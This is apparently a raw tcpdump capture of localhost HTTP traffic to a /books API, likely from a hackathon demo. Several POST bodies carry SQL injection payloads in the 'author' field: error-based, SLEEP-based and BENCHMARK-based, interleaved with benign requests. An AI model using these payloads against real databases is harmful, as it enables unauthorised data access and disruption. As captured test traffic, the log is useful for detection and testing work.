22:20:22.489140 IP6 (hlim 64, next-header TCP (6) payload length: 40) ::1.55620 > ::1.8080: Flags [S], cksum 0x0030 (incorrect -> 0x1f90), seq 731000437, win 43690, options [mss 65476,sackOK,TS val 9842753 ecr 0,nop,wscale 7], length 0
22:20:22.489196 IP6 (hlim 64, next-header TCP (6) payload length: 40) ::1.8080 > ::1.55620: Flags [S.], cksum 0x0030 (incorrect -> 0xbc1b), seq 746915335, ack 731000438, win 43690, options [mss 65476,sackOK,TS val 9842753 ecr 9842753,nop,wscale 7], length 0
22:20:22.489240 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.55620 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0x8e4d), seq 1, ack 1, win 342, options [nop,nop,TS val 9842753 ecr 9842753], length 0
22:20:22.489336 IP6 (hlim 64, next-header TCP (6) payload length: 428) ::1.55620 > ::1.8080: Flags [P.], cksum 0x01b4 (incorrect -> 0xaccb), seq 1:397, ack 1, win 342, options [nop,nop,TS val 9842753 ecr 9842753], length 396: HTTP, length: 396
	POST /books HTTP/1.1
	User-Agent: curl/7.29.0
	Host: localhost:8080
	Accept: */*
	Content-type:application/json
	Content-Length: 260
	
	{"name":"Hackathon-Demo0","author":"RameshAND ROW(4115,7844)>(SELECT COUNT(*),CONCAT(0x717a786271,(SELECT (ELT(4115=4115,1))),0x7176767871,FLOOR(RAND(0)*2))x FROM (SELECT 9757 UNION SELECT 8982 UNION SELECT 5308 UNION SELECT 5233)a GROUP BY x)","price":"9.99"}[!http]
22:20:22.489372 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.8080 > ::1.55620: Flags [.], cksum 0x0028 (incorrect -> 0x8cb9), seq 1, ack 397, win 350, options [nop,nop,TS val 9842753 ecr 9842753], length 0
22:20:22.491594 IP6 (hlim 64, next-header TCP (6) payload length: 434) ::1.8080 > ::1.55620: Flags [P.], cksum 0x01ba (incorrect -> 0x3841), seq 1:403, ack 397, win 350, options [nop,nop,TS val 9842755 ecr 9842753], length 402: HTTP, length: 402
	HTTP/1.1 201 
	Content-Type: application/json;charset=UTF-8
	Transfer-Encoding: chunked
	Date: Thu, 27 Jun 2019 22:20:22 GMT
	
	10b
	{"id":187,"name":"Hackathon-Demo0","author":"RameshAND ROW(4115,7844)>(SELECT COUNT(*),CONCAT(0x717a786271,(SELECT (ELT(4115=4115,1))),0x7176767871,FLOOR(RAND(0)*2))x FROM (SELECT 9757 UNION SELECT 8982 UNION SELECT 5308 UNION SELECT 5233)a GROUP BY x)","price":9.99}
22:20:22.491616 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.55620 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0x8b23), seq 397, ack 403, win 350, options [nop,nop,TS val 9842755 ecr 9842755], length 0
22:20:22.491885 IP6 (hlim 64, next-header TCP (6) payload length: 37) ::1.8080 > ::1.55620: Flags [P.], cksum 0x002d (incorrect -> 0x46fb), seq 403:408, ack 397, win 350, options [nop,nop,TS val 9842756 ecr 9842755], length 5: HTTP
22:20:22.491903 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.55620 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0x8b1c), seq 397, ack 408, win 350, options [nop,nop,TS val 9842756 ecr 9842756], length 0
22:20:22.492013 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.55620 > ::1.8080: Flags [F.], cksum 0x0028 (incorrect -> 0x8b1b), seq 397, ack 408, win 350, options [nop,nop,TS val 9842756 ecr 9842756], length 0
22:20:22.492151 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.8080 > ::1.55620: Flags [F.], cksum 0x0028 (incorrect -> 0x8b1a), seq 408, ack 398, win 350, options [nop,nop,TS val 9842756 ecr 9842756], length 0
22:20:22.492171 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.55620 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0x8b1a), seq 398, ack 409, win 350, options [nop,nop,TS val 9842756 ecr 9842756], length 0
22:20:22.502458 IP6 (hlim 64, next-header TCP (6) payload length: 40) ::1.55622 > ::1.8080: Flags [S], cksum 0x0030 (incorrect -> 0x2d1c), seq 3394208284, win 43690, options [mss 65476,sackOK,TS val 9842766 ecr 0,nop,wscale 7], length 0
22:20:22.502486 IP6 (hlim 64, next-header TCP (6) payload length: 40) ::1.8080 > ::1.55622: Flags [S.], cksum 0x0030 (incorrect -> 0xaf43), seq 1768350588, ack 3394208285, win 43690, options [mss 65476,sackOK,TS val 9842766 ecr 9842766,nop,wscale 7], length 0
22:20:22.502508 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.55622 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0x8175), seq 1, ack 1, win 342, options [nop,nop,TS val 9842766 ecr 9842766], length 0
22:20:22.502601 IP6 (hlim 64, next-header TCP (6) payload length: 228) ::1.55622 > ::1.8080: Flags [P.], cksum 0x00ec (incorrect -> 0x8522), seq 1:197, ack 1, win 342, options [nop,nop,TS val 9842766 ecr 9842766], length 196: HTTP, length: 196
	POST /books HTTP/1.1
	User-Agent: curl/7.29.0
	Host: localhost:8080
	Accept: */*
	Content-type:application/json
	Content-Length: 61
	
	{"name":"Hackathon-Demo1","author":"Ramesh-P","price":"9.99"}[!http]
22:20:22.502617 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.8080 > ::1.55622: Flags [.], cksum 0x0028 (incorrect -> 0x80a9), seq 1, ack 197, win 350, options [nop,nop,TS val 9842766 ecr 9842766], length 0
22:20:22.505283 IP6 (hlim 64, next-header TCP (6) payload length: 234) ::1.8080 > ::1.55622: Flags [P.], cksum 0x00f2 (incorrect -> 0x9cfc), seq 1:203, ack 197, win 350, options [nop,nop,TS val 9842769 ecr 9842766], length 202: HTTP, length: 202
	HTTP/1.1 201 
	Content-Type: application/json;charset=UTF-8
	Transfer-Encoding: chunked
	Date: Thu, 27 Jun 2019 22:20:22 GMT
	
	44
	{"id":188,"name":"Hackathon-Demo1","author":"Ramesh-P","price":9.99}
22:20:22.505296 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.55622 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0x7fd9), seq 197, ack 203, win 350, options [nop,nop,TS val 9842769 ecr 9842769], length 0
22:20:22.505522 IP6 (hlim 64, next-header TCP (6) payload length: 37) ::1.8080 > ::1.55622: Flags [P.], cksum 0x002d (incorrect -> 0x3bb2), seq 203:208, ack 197, win 350, options [nop,nop,TS val 9842769 ecr 9842769], length 5: HTTP
22:20:22.505533 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.55622 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0x7fd4), seq 197, ack 208, win 350, options [nop,nop,TS val 9842769 ecr 9842769], length 0
22:20:22.505627 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.55622 > ::1.8080: Flags [F.], cksum 0x0028 (incorrect -> 0x7fd3), seq 197, ack 208, win 350, options [nop,nop,TS val 9842769 ecr 9842769], length 0
22:20:22.505769 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.8080 > ::1.55622: Flags [F.], cksum 0x0028 (incorrect -> 0x7fd2), seq 208, ack 198, win 350, options [nop,nop,TS val 9842769 ecr 9842769], length 0
22:20:22.505786 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.55622 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0x7fd2), seq 198, ack 209, win 350, options [nop,nop,TS val 9842769 ecr 9842769], length 0
22:20:22.514586 IP6 (hlim 64, next-header TCP (6) payload length: 40) ::1.55624 > ::1.8080: Flags [S], cksum 0x0030 (incorrect -> 0x912c), seq 4172476314, win 43690, options [mss 65476,sackOK,TS val 9842778 ecr 0,nop,wscale 7], length 0
22:20:22.514602 IP6 (hlim 64, next-header TCP (6) payload length: 40) ::1.8080 > ::1.55624: Flags [S.], cksum 0x0030 (incorrect -> 0xd08d), seq 2438397510, ack 4172476315, win 43690, options [mss 65476,sackOK,TS val 9842778 ecr 9842778,nop,wscale 7], length 0
22:20:22.514615 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.55624 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0xa2bf), seq 1, ack 1, win 342, options [nop,nop,TS val 9842778 ecr 9842778], length 0
22:20:22.514703 IP6 (hlim 64, next-header TCP (6) payload length: 239) ::1.55624 > ::1.8080: Flags [P.], cksum 0x00f7 (incorrect -> 0x4825), seq 1:208, ack 1, win 342, options [nop,nop,TS val 9842778 ecr 9842778], length 207: HTTP, length: 207
	POST /books HTTP/1.1
	User-Agent: curl/7.29.0
	Host: localhost:8080
	Accept: */*
	Content-type:application/json
	Content-Length: 72
	
	{"name":"Hackathon-Demo2","author":"Ramesh AND SLEEP(5)","price":"9.99"}[!http]
22:20:22.514719 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.8080 > ::1.55624: Flags [.], cksum 0x0028 (incorrect -> 0xa1e8), seq 1, ack 208, win 350, options [nop,nop,TS val 9842778 ecr 9842778], length 0
22:20:22.516363 IP6 (hlim 64, next-header TCP (6) payload length: 245) ::1.8080 > ::1.55624: Flags [P.], cksum 0x00fd (incorrect -> 0x4cd7), seq 1:214, ack 208, win 350, options [nop,nop,TS val 9842780 ecr 9842778], length 213: HTTP, length: 213
	HTTP/1.1 201 
	Content-Type: application/json;charset=UTF-8
	Transfer-Encoding: chunked
	Date: Thu, 27 Jun 2019 22:20:22 GMT
	
	4f
	{"id":189,"name":"Hackathon-Demo2","author":"Ramesh AND SLEEP(5)","price":9.99}
22:20:22.516380 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.55624 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0xa10f), seq 208, ack 214, win 350, options [nop,nop,TS val 9842780 ecr 9842780], length 0
22:20:22.516582 IP6 (hlim 64, next-header TCP (6) payload length: 37) ::1.8080 > ::1.55624: Flags [P.], cksum 0x002d (incorrect -> 0x5ce8), seq 214:219, ack 208, win 350, options [nop,nop,TS val 9842780 ecr 9842780], length 5: HTTP
22:20:22.516598 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.55624 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0xa10a), seq 208, ack 219, win 350, options [nop,nop,TS val 9842780 ecr 9842780], length 0
22:20:22.516762 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.55624 > ::1.8080: Flags [F.], cksum 0x0028 (incorrect -> 0xa109), seq 208, ack 219, win 350, options [nop,nop,TS val 9842780 ecr 9842780], length 0
22:20:22.517014 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.8080 > ::1.55624: Flags [F.], cksum 0x0028 (incorrect -> 0xa107), seq 219, ack 209, win 350, options [nop,nop,TS val 9842781 ecr 9842780], length 0
22:20:22.517032 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.55624 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0xa106), seq 209, ack 220, win 350, options [nop,nop,TS val 9842781 ecr 9842781], length 0
22:20:22.525345 IP6 (hlim 64, next-header TCP (6) payload length: 40) ::1.55626 > ::1.8080: Flags [S], cksum 0x0030 (incorrect -> 0x54e3), seq 4235798544, win 43690, options [mss 65476,sackOK,TS val 9842789 ecr 0,nop,wscale 7], length 0
22:20:22.525367 IP6 (hlim 64, next-header TCP (6) payload length: 40) ::1.8080 > ::1.55626: Flags [S.], cksum 0x0030 (incorrect -> 0x3111), seq 4167629404, ack 4235798545, win 43690, options [mss 65476,sackOK,TS val 9842789 ecr 9842789,nop,wscale 7], length 0
22:20:22.525384 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.55626 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0x0343), seq 1, ack 1, win 342, options [nop,nop,TS val 9842789 ecr 9842789], length 0
22:20:22.525473 IP6 (hlim 64, next-header TCP (6) payload length: 228) ::1.55626 > ::1.8080: Flags [P.], cksum 0x00ec (incorrect -> 0x04f0), seq 1:197, ack 1, win 342, options [nop,nop,TS val 9842789 ecr 9842789], length 196: HTTP, length: 196
	POST /books HTTP/1.1
	User-Agent: curl/7.29.0
	Host: localhost:8080
	Accept: */*
	Content-type:application/json
	Content-Length: 61
	
	{"name":"Hackathon-Demo3","author":"Ramesh-P","price":"9.99"}[!http]
22:20:22.525487 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.8080 > ::1.55626: Flags [.], cksum 0x0028 (incorrect -> 0x0277), seq 1, ack 197, win 350, options [nop,nop,TS val 9842789 ecr 9842789], length 0
22:20:22.527554 IP6 (hlim 64, next-header TCP (6) payload length: 234) ::1.8080 > ::1.55626: Flags [P.], cksum 0x00f2 (incorrect -> 0x24ca), seq 1:203, ack 197, win 350, options [nop,nop,TS val 9842791 ecr 9842789], length 202: HTTP, length: 202
	HTTP/1.1 201 
	Content-Type: application/json;charset=UTF-8
	Transfer-Encoding: chunked
	Date: Thu, 27 Jun 2019 22:20:22 GMT
	
	44
	{"id":190,"name":"Hackathon-Demo3","author":"Ramesh-P","price":9.99}
22:20:22.527605 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.55626 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0x01a9), seq 197, ack 203, win 350, options [nop,nop,TS val 9842791 ecr 9842791], length 0
22:20:22.527832 IP6 (hlim 64, next-header TCP (6) payload length: 37) ::1.8080 > ::1.55626: Flags [P.], cksum 0x002d (incorrect -> 0xbd81), seq 203:208, ack 197, win 350, options [nop,nop,TS val 9842791 ecr 9842791], length 5: HTTP
22:20:22.527894 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.55626 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0x01a3), seq 197, ack 208, win 350, options [nop,nop,TS val 9842792 ecr 9842791], length 0
22:20:22.528098 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.55626 > ::1.8080: Flags [F.], cksum 0x0028 (incorrect -> 0x01a2), seq 197, ack 208, win 350, options [nop,nop,TS val 9842792 ecr 9842791], length 0
22:20:22.528223 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.8080 > ::1.55626: Flags [F.], cksum 0x0028 (incorrect -> 0x01a0), seq 208, ack 198, win 350, options [nop,nop,TS val 9842792 ecr 9842792], length 0
22:20:22.528242 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.55626 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0x01a0), seq 198, ack 209, win 350, options [nop,nop,TS val 9842792 ecr 9842792], length 0
22:20:22.537848 IP6 (hlim 64, next-header TCP (6) payload length: 40) ::1.55628 > ::1.8080: Flags [S], cksum 0x0030 (incorrect -> 0xcc2f), seq 2491947175, win 43690, options [mss 65476,sackOK,TS val 9842801 ecr 0,nop,wscale 7], length 0
22:20:22.537882 IP6 (hlim 64, next-header TCP (6) payload length: 40) ::1.8080 > ::1.55628: Flags [S.], cksum 0x0030 (incorrect -> 0x3a2d), seq 2688663719, ack 2491947176, win 43690, options [mss 65476,sackOK,TS val 9842802 ecr 9842801,nop,wscale 7], length 0
22:20:22.537910 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.55628 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0x0c5e), seq 1, ack 1, win 342, options [nop,nop,TS val 9842802 ecr 9842802], length 0
22:20:22.538023 IP6 (hlim 64, next-header TCP (6) payload length: 240) ::1.55628 > ::1.8080: Flags [P.], cksum 0x00f8 (incorrect -> 0x94b9), seq 1:209, ack 1, win 342, options [nop,nop,TS val 9842802 ecr 9842802], length 208: HTTP, length: 208
	POST /books HTTP/1.1
	User-Agent: curl/7.29.0
	Host: localhost:8080
	Accept: */*
	Content-type:application/json
	Content-Length: 73
	
	{"name":"Hackathon-Demo4","author":"Ramesh AND SLEEP(5)#","price":"9.99"}[!http]
22:20:22.538068 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.8080 > ::1.55628: Flags [.], cksum 0x0028 (incorrect -> 0x0b86), seq 1, ack 209, win 350, options [nop,nop,TS val 9842802 ecr 9842802], length 0
22:20:22.540400 IP6 (hlim 64, next-header TCP (6) payload length: 246) ::1.8080 > ::1.55628: Flags [P.], cksum 0x00fe (incorrect -> 0xb48c), seq 1:215, ack 209, win 350, options [nop,nop,TS val 9842804 ecr 9842802], length 214: HTTP, length: 214
	HTTP/1.1 201 
	Content-Type: application/json;charset=UTF-8
	Transfer-Encoding: chunked
	Date: Thu, 27 Jun 2019 22:20:22 GMT
	
	50
	{"id":191,"name":"Hackathon-Demo4","author":"Ramesh AND SLEEP(5)#","price":9.99}
22:20:22.540426 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.55628 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0x0aac), seq 209, ack 215, win 350, options [nop,nop,TS val 9842804 ecr 9842804], length 0
22:20:22.540647 IP6 (hlim 64, next-header TCP (6) payload length: 37) ::1.8080 > ::1.55628: Flags [P.], cksum 0x002d (incorrect -> 0xc684), seq 215:220, ack 209, win 350, options [nop,nop,TS val 9842804 ecr 9842804], length 5: HTTP
22:20:22.540663 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.55628 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0x0aa7), seq 209, ack 220, win 350, options [nop,nop,TS val 9842804 ecr 9842804], length 0
22:20:22.540805 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.55628 > ::1.8080: Flags [F.], cksum 0x0028 (incorrect -> 0x0aa6), seq 209, ack 220, win 350, options [nop,nop,TS val 9842804 ecr 9842804], length 0
22:20:22.541568 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.8080 > ::1.55628: Flags [F.], cksum 0x0028 (incorrect -> 0x0aa4), seq 220, ack 210, win 350, options [nop,nop,TS val 9842805 ecr 9842804], length 0
22:20:22.541587 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.55628 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0x0aa3), seq 210, ack 221, win 350, options [nop,nop,TS val 9842805 ecr 9842805], length 0
22:20:22.567321 IP6 (hlim 64, next-header TCP (6) payload length: 40) ::1.55630 > ::1.8080: Flags [S], cksum 0x0030 (incorrect -> 0x3e73), seq 3327095932, win 43690, options [mss 65476,sackOK,TS val 9842831 ecr 0,nop,wscale 7], length 0
22:20:22.567343 IP6 (hlim 64, next-header TCP (6) payload length: 40) ::1.8080 > ::1.55630: Flags [S.], cksum 0x0030 (incorrect -> 0x89d7), seq 2505371152, ack 3327095933, win 43690, options [mss 65476,sackOK,TS val 9842831 ecr 9842831,nop,wscale 7], length 0
22:20:22.567357 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.55630 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0x5c09), seq 1, ack 1, win 342, options [nop,nop,TS val 9842831 ecr 9842831], length 0
22:20:22.567458 IP6 (hlim 64, next-header TCP (6) payload length: 228) ::1.55630 > ::1.8080: Flags [P.], cksum 0x00ec (incorrect -> 0x5bb6), seq 1:197, ack 1, win 342, options [nop,nop,TS val 9842831 ecr 9842831], length 196: HTTP, length: 196
	POST /books HTTP/1.1
	User-Agent: curl/7.29.0
	Host: localhost:8080
	Accept: */*
	Content-type:application/json
	Content-Length: 61
	
	{"name":"Hackathon-Demo5","author":"Ramesh-P","price":"9.99"}[!http]
22:20:22.567473 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.8080 > ::1.55630: Flags [.], cksum 0x0028 (incorrect -> 0x5b3d), seq 1, ack 197, win 350, options [nop,nop,TS val 9842831 ecr 9842831], length 0
22:20:22.570028 IP6 (hlim 64, next-header TCP (6) payload length: 234) ::1.8080 > ::1.55630: Flags [P.], cksum 0x00f2 (incorrect -> 0x798f), seq 1:203, ack 197, win 350, options [nop,nop,TS val 9842834 ecr 9842831], length 202: HTTP, length: 202
	HTTP/1.1 201 
	Content-Type: application/json;charset=UTF-8
	Transfer-Encoding: chunked
	Date: Thu, 27 Jun 2019 22:20:22 GMT
	
	44
	{"id":192,"name":"Hackathon-Demo5","author":"Ramesh-P","price":9.99}
22:20:22.570054 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.55630 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0x5a6d), seq 197, ack 203, win 350, options [nop,nop,TS val 9842834 ecr 9842834], length 0
22:20:22.570308 IP6 (hlim 64, next-header TCP (6) payload length: 37) ::1.8080 > ::1.55630: Flags [P.], cksum 0x002d (incorrect -> 0x1646), seq 203:208, ack 197, win 350, options [nop,nop,TS val 9842834 ecr 9842834], length 5: HTTP
22:20:22.570351 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.55630 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0x5a68), seq 197, ack 208, win 350, options [nop,nop,TS val 9842834 ecr 9842834], length 0
22:20:22.570461 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.55630 > ::1.8080: Flags [F.], cksum 0x0028 (incorrect -> 0x5a67), seq 197, ack 208, win 350, options [nop,nop,TS val 9842834 ecr 9842834], length 0
22:20:22.570615 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.8080 > ::1.55630: Flags [F.], cksum 0x0028 (incorrect -> 0x5a66), seq 208, ack 198, win 350, options [nop,nop,TS val 9842834 ecr 9842834], length 0
22:20:22.570644 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.55630 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0x5a66), seq 198, ack 209, win 350, options [nop,nop,TS val 9842834 ecr 9842834], length 0
22:20:22.581326 IP6 (hlim 64, next-header TCP (6) payload length: 40) ::1.55632 > ::1.8080: Flags [S], cksum 0x0030 (incorrect -> 0x652d), seq 821158672, win 43690, options [mss 65476,sackOK,TS val 9842845 ecr 0,nop,wscale 7], length 0
22:20:22.581364 IP6 (hlim 64, next-header TCP (6) payload length: 40) ::1.8080 > ::1.55632: Flags [S.], cksum 0x0030 (incorrect -> 0x81b5), seq 996505294, ack 821158673, win 43690, options [mss 65476,sackOK,TS val 9842845 ecr 9842845,nop,wscale 7], length 0
22:20:22.581414 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.55632 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0x53e7), seq 1, ack 1, win 342, options [nop,nop,TS val 9842845 ecr 9842845], length 0
22:20:22.581525 IP6 (hlim 64, next-header TCP (6) payload length: 317) ::1.55632 > ::1.8080: Flags [P.], cksum 0x0145 (incorrect -> 0x4b02), seq 1:286, ack 1, win 342, options [nop,nop,TS val 9842845 ecr 9842845], length 285: HTTP, length: 285
	POST /books HTTP/1.1
	User-Agent: curl/7.29.0
	Host: localhost:8080
	Accept: */*
	Content-type:application/json
	Content-Length: 149
	
	{"name":"Hackathon-Demo6","author":"Ramesh PROCEDURE ANALYSE(EXTRACTVALUE(3695,CONCAT(0x5c,(BENCHMARK(5000000,MD5(0x50477a4b))))),1)","price":"9.99"}[!http]
22:20:22.581566 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.8080 > ::1.55632: Flags [.], cksum 0x0028 (incorrect -> 0x52c2), seq 1, ack 286, win 350, options [nop,nop,TS val 9842845 ecr 9842845], length 0
22:20:22.583134 IP6 (hlim 64, next-header TCP (6) payload length: 322) ::1.8080 > ::1.55632: Flags [P.], cksum 0x014a (incorrect -> 0xfcf1), seq 1:291, ack 286, win 350, options [nop,nop,TS val 9842847 ecr 9842845], length 290: HTTP, length: 290
	HTTP/1.1 201 
	Content-Type: application/json;charset=UTF-8
	Transfer-Encoding: chunked
	Date: Thu, 27 Jun 2019 22:20:22 GMT
	
	9c
	{"id":193,"name":"Hackathon-Demo6","author":"Ramesh PROCEDURE ANALYSE(EXTRACTVALUE(3695,CONCAT(0x5c,(BENCHMARK(5000000,MD5(0x50477a4b))))),1)","price":9.99}
22:20:22.583153 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.55632 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0x519c), seq 286, ack 291, win 350, options [nop,nop,TS val 9842847 ecr 9842847], length 0
22:20:22.583345 IP6 (hlim 64, next-header TCP (6) payload length: 37) ::1.8080 > ::1.55632: Flags [P.], cksum 0x002d (incorrect -> 0x0d75), seq 291:296, ack 286, win 350, options [nop,nop,TS val 9842847 ecr 9842847], length 5: HTTP
22:20:22.583361 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.55632 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0x5197), seq 286, ack 296, win 350, options [nop,nop,TS val 9842847 ecr 9842847], length 0
22:20:22.583471 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.55632 > ::1.8080: Flags [F.], cksum 0x0028 (incorrect -> 0x5196), seq 286, ack 296, win 350, options [nop,nop,TS val 9842847 ecr 9842847], length 0
22:20:22.583600 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.8080 > ::1.55632: Flags [F.], cksum 0x0028 (incorrect -> 0x5195), seq 296, ack 287, win 350, options [nop,nop,TS val 9842847 ecr 9842847], length 0
22:20:22.583618 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.55632 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0x5195), seq 287, ack 297, win 350, options [nop,nop,TS val 9842847 ecr 9842847], length 0
22:20:22.597975 IP6 (hlim 64, next-header TCP (6) payload length: 40) ::1.55634 > ::1.8080: Flags [S], cksum 0x0030 (incorrect -> 0xee74), seq 2867060675, win 43690, options [mss 65476,sackOK,TS val 9842862 ecr 0,nop,wscale 7], length 0
22:20:22.597996 IP6 (hlim 64, next-header TCP (6) payload length: 40) ::1.8080 > ::1.55634: Flags [S.], cksum 0x0030 (incorrect -> 0xdae1), seq 1320588167, ack 2867060676, win 43690, options [mss 65476,sackOK,TS val 9842862 ecr 9842862,nop,wscale 7], length 0
22:20:22.598012 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.55634 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0xad13), seq 1, ack 1, win 342, options [nop,nop,TS val 9842862 ecr 9842862], length 0
22:20:22.598093 IP6 (hlim 64, next-header TCP (6) payload length: 228) ::1.55634 > ::1.8080: Flags [P.], cksum 0x00ec (incorrect -> 0xaac0), seq 1:197, ack 1, win 342, options [nop,nop,TS val 9842862 ecr 9842862], length 196: HTTP, length: 196
	POST /books HTTP/1.1
	User-Agent: curl/7.29.0
	Host: localhost:8080
	Accept: */*
	Content-type:application/json
	Content-Length: 61
	
	{"name":"Hackathon-Demo7","author":"Ramesh-P","price":"9.99"}[!http]
22:20:22.598105 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.8080 > ::1.55634: Flags [.], cksum 0x0028 (incorrect -> 0xac47), seq 1, ack 197, win 350, options [nop,nop,TS val 9842862 ecr 9842862], length 0
22:20:22.604642 IP6 (hlim 64, next-header TCP (6) payload length: 234) ::1.8080 > ::1.55634: Flags [P.], cksum 0x00f2 (incorrect -> 0xc696), seq 1:203, ack 197, win 350, options [nop,nop,TS val 9842868 ecr 9842862], length 202: HTTP, length: 202
	HTTP/1.1 201 
	Content-Type: application/json;charset=UTF-8
	Transfer-Encoding: chunked
	Date: Thu, 27 Jun 2019 22:20:22 GMT
	
	44
	{"id":194,"name":"Hackathon-Demo7","author":"Ramesh-P","price":9.99}
22:20:22.604661 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.55634 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0xab71), seq 197, ack 203, win 350, options [nop,nop,TS val 9842868 ecr 9842868], length 0
22:20:22.604908 IP6 (hlim 64, next-header TCP (6) payload length: 37) ::1.8080 > ::1.55634: Flags [P.], cksum 0x002d (incorrect -> 0x6749), seq 203:208, ack 197, win 350, options [nop,nop,TS val 9842869 ecr 9842868], length 5: HTTP
22:20:22.604923 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.55634 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0xab6a), seq 197, ack 208, win 350, options [nop,nop,TS val 9842869 ecr 9842869], length 0
22:20:22.609017 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.55634 > ::1.8080: Flags [F.], cksum 0x0028 (incorrect -> 0xab65), seq 197, ack 208, win 350, options [nop,nop,TS val 9842873 ecr 9842869], length 0
22:20:22.609929 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.8080 > ::1.55634: Flags [F.], cksum 0x0028 (incorrect -> 0xab5f), seq 208, ack 198, win 350, options [nop,nop,TS val 9842874 ecr 9842873], length 0
22:20:22.609948 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.55634 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0xab5e), seq 198, ack 209, win 350, options [nop,nop,TS val 9842874 ecr 9842874], length 0
22:20:22.619213 IP6 (hlim 64, next-header TCP (6) payload length: 40) ::1.55636 > ::1.8080: Flags [S], cksum 0x0030 (incorrect -> 0xe13a), seq 3660955028, win 43690, options [mss 65476,sackOK,TS val 9842883 ecr 0,nop,wscale 7], length 0
22:20:22.619238 IP6 (hlim 64, next-header TCP (6) payload length: 40) ::1.8080 > ::1.55636: Flags [S.], cksum 0x0030 (incorrect -> 0x7e25), seq 96807910, ack 3660955029, win 43690, options [mss 65476,sackOK,TS val 9842883 ecr 9842883,nop,wscale 7], length 0
22:20:22.619263 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.55636 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0x5057), seq 1, ack 1, win 342, options [nop,nop,TS val 9842883 ecr 9842883], length 0
